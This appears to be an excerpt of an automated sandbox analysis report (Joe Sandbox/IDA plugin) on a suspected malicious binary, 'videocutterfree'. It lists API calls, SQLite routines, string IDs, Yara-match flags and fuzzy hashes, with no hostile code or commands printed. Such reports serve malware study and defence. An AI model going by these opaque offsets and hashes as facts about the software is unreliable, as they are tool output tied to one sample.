                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                              • String ID:
                                                                              • API String ID: 2903785150-0
                                                                              • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                              • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                              • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                              • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00993428
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 0099346B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00993472
                                                                              • GetLastError.KERNEL32 ref: 00993486
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009934D7
                                                                              • RtlEnterCriticalSection.NTDLL(00000018), ref: 009934ED
                                                                              • RtlLeaveCriticalSection.NTDLL(00000018), ref: 00993518
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                              • String ID: CancelIoEx$KERNEL32
                                                                              • API String ID: 2902213904-434325024
                                                                              • Opcode ID: 28d04e345e762ca60a63f8cf53a5ec34a22449cfa752709e591ee736e043a6c5
                                                                              • Instruction ID: 30ed161f26b55b4bc4e8b2fa34c8810a86366674861ebf1d270a5602fa5bb403
                                                                              • Opcode Fuzzy Hash: 28d04e345e762ca60a63f8cf53a5ec34a22449cfa752709e591ee736e043a6c5
                                                                              • Instruction Fuzzy Hash: 1B318F71914205DFDF01EF69C9847AABBF8FF89320F11856AE805DB251C774DA00CBA1
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 0040560A
                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405622
                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405633
                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405640
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                              • API String ID: 2238633743-4044615076
                                                                              • Opcode ID: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
                                                                              • Instruction ID: ead162a18fffdd40eb8e772db2356e950993cec74924736d99ef4b12e5713d98
                                                                              • Opcode Fuzzy Hash: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
                                                                              • Instruction Fuzzy Hash: 88014431600711ABC7119FB5AD80E1B3AE8EB48790755083BF909F22A1E779D821DF6D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                              • API String ID: 0-780898
                                                                              • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                              • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                              • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                              • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                              • API String ID: 0-2604012851
                                                                              • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                              • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                              • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                              • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00405395,00200020,00000000,?,00000000,00000000), ref: 00405B07
                                                                              • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B23
                                                                              • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405395,?,00000103,00000001,00000000,?,00405395,00200020,00000000,?,00000000,00000000), ref: 00405B6C
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405395,00200020,00000000,?,00000000,00000000), ref: 00405BA4
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405395,00200020,00000000,?,00000000), ref: 00405BFC
                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405395,00200020,00000000,?,00000000), ref: 00405C12
                                                                              • LCMapStringW.KERNEL32(00000000,?,00405395,00000000,00405395,?,?,00405395,00200020,00000000,?,00000000), ref: 00405C45
                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405395,00200020,00000000,?,00000000), ref: 00405CAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 352835431-0
                                                                              • Opcode ID: 68f946337cb6166b78cd46be37bef06e7d8fc1e8846bea79de14a0fa50c26d58
                                                                              • Instruction ID: 1a6af74912257c949d8729c3d91802bd2769d9a340a31b4fcb57ed0edd8469dc
                                                                              • Opcode Fuzzy Hash: 68f946337cb6166b78cd46be37bef06e7d8fc1e8846bea79de14a0fa50c26d58
                                                                              • Instruction Fuzzy Hash: 7D519B31904A48AFDF219F94CE45AEF7FB9FB48B44F10412AF915B12A0C3399960DF69
                                                                              APIs
                                                                              • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                              • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                              • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                              • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                              • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                              • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                              • String ID: |
                                                                              • API String ID: 1576672187-2343686810
                                                                              • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                              • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                              • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                              • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                              APIs
                                                                              • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                              • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                              • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                              • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                              • API String ID: 652164897-1572359634
                                                                              • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                              • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                              • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                              • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403EB6
                                                                              • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00403F8C
                                                                              • WriteFile.KERNEL32(00000000), ref: 00403F93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandleModuleNameWrite
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3784150691-4022980321
                                                                              • Opcode ID: bbd6413f63fe96b7e5b48312adb5ae61c8d63f3eaa3365522491f5c9dac2931a
                                                                              • Instruction ID: 3c6e91fafd8a39623fea44a7e4d0bb864fdf88bac524e29ab6bf21fbc7efbe24
                                                                              • Opcode Fuzzy Hash: bbd6413f63fe96b7e5b48312adb5ae61c8d63f3eaa3365522491f5c9dac2931a
                                                                              • Instruction Fuzzy Hash: 6D31D472A40218AEDF20EB60CD49F9B776DEB41305F1004BBF545F61C0E6B8EB948A9D
                                                                              APIs
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                              • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                              • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                              • String ID:
                                                                              • API String ID: 2352520524-0
                                                                              • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                              • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                              • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                              • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                              APIs
                                                                                • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                              • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                              • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                              • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                              • String ID: optimize
                                                                              • API String ID: 3659050757-3797040228
                                                                              • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                              • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                              • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                              • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                              APIs
                                                                              • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                              • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                              • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                              • sqlite3_free.SQLITE3 ref: 6096477B
                                                                              • sqlite3_free.SQLITE3 ref: 60964783
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                              • String ID:
                                                                              • API String ID: 571598680-0
                                                                              • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                              • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                              • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                              • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 004037A9
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 004037BD
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 004037E9
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FD4), ref: 00403821
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FD4), ref: 00403843
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FD4), ref: 0040385C
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FD4), ref: 0040386F
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004038AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1823725401-0
                                                                              • Opcode ID: ab2790d97251511a40c3572448f08c6a970ad3f5a554216861b1f685f7881b14
                                                                              • Instruction ID: 6d0065f3ce240da63f4aa51e87ad3c69eba18c37eea41e84d35f232e94358c46
                                                                              • Opcode Fuzzy Hash: ab2790d97251511a40c3572448f08c6a970ad3f5a554216861b1f685f7881b14
                                                                              • Instruction Fuzzy Hash: 3C3126B35042251EE7213F755C8483B7EDCEA8535A71149BFF552F3281E6398E8142AD
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,F3247817), ref: 009A0460
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A0475
                                                                              • ResetEvent.KERNEL32(00000000,F3247817), ref: 009A047F
                                                                              • CloseHandle.KERNEL32(00000000,F3247817), ref: 009A04B4
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F3247817), ref: 009A052A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A053F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                                              • String ID:
                                                                              • API String ID: 1285874450-0
                                                                              • Opcode ID: 9aee9ff80157aa7045c67d2068e11fa812cfa6c11ad9b75c6a6cf40a2b0d958c
                                                                              • Instruction ID: f570ecadaf5b3b08e1bcfbe3d8549f6983c8cd71dd599d9eca1538d3926a8948
                                                                              • Opcode Fuzzy Hash: 9aee9ff80157aa7045c67d2068e11fa812cfa6c11ad9b75c6a6cf40a2b0d958c
                                                                              • Instruction Fuzzy Hash: BB415070D043489FDF10CFA5C845B9EBBF8BF8A724F104219E918AB291E7359905CB90
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 009920AC
                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009920CD
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009920D8
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0099213E
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 0099217A
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00992187
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009921A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                              • String ID:
                                                                              • API String ID: 1171374749-0
                                                                              • Opcode ID: 5d63350120b5955de8b6f836052a2ee137d7b1bba47453827b5c679f55f9d198
                                                                              • Instruction ID: fc8b5ba1c7103d8a46fe001c6f713c6ddc416a21cc0373660b911a728a4072c4
                                                                              • Opcode Fuzzy Hash: 5d63350120b5955de8b6f836052a2ee137d7b1bba47453827b5c679f55f9d198
                                                                              • Instruction Fuzzy Hash: F1412875508701AFC721DF2AD885A6BBBE9FFD8760F000A1EF49682250D734E909DB92
                                                                              APIs
                                                                                • Part of subcall function 009A0C80: OpenEventA.KERNEL32(00100002,00000000,?,?,?,009A04DE,?,?), ref: 009A0CAF
                                                                                • Part of subcall function 009A0C80: CloseHandle.KERNEL32(00000000,?,?,009A04DE,?,?), ref: 009A0CC4
                                                                                • Part of subcall function 009A0C80: SetEvent.KERNEL32(00000000,009A04DE,?,?), ref: 009A0CD7
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,F3247817), ref: 009A0460
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A0475
                                                                              • ResetEvent.KERNEL32(00000000,F3247817), ref: 009A047F
                                                                              • CloseHandle.KERNEL32(00000000,F3247817), ref: 009A04B4
                                                                              • __CxxThrowException@8.LIBCMT ref: 009A04E5
                                                                                • Part of subcall function 009A330A: RaiseException.KERNEL32(?,?,0099E90E,?,?,?,?,?,?,?,0099E90E,?,009BFCF8,?), ref: 009A335F
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F3247817), ref: 009A052A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A053F
                                                                                • Part of subcall function 009A09C0: GetCurrentProcessId.KERNEL32(?), ref: 009A0A19
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,F3247817), ref: 009A054F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2227236058-0
                                                                              • Opcode ID: 384790d679f6ab9f983f5780f034c15b06af3ee2b5bac9904e05162c20bdfa9d
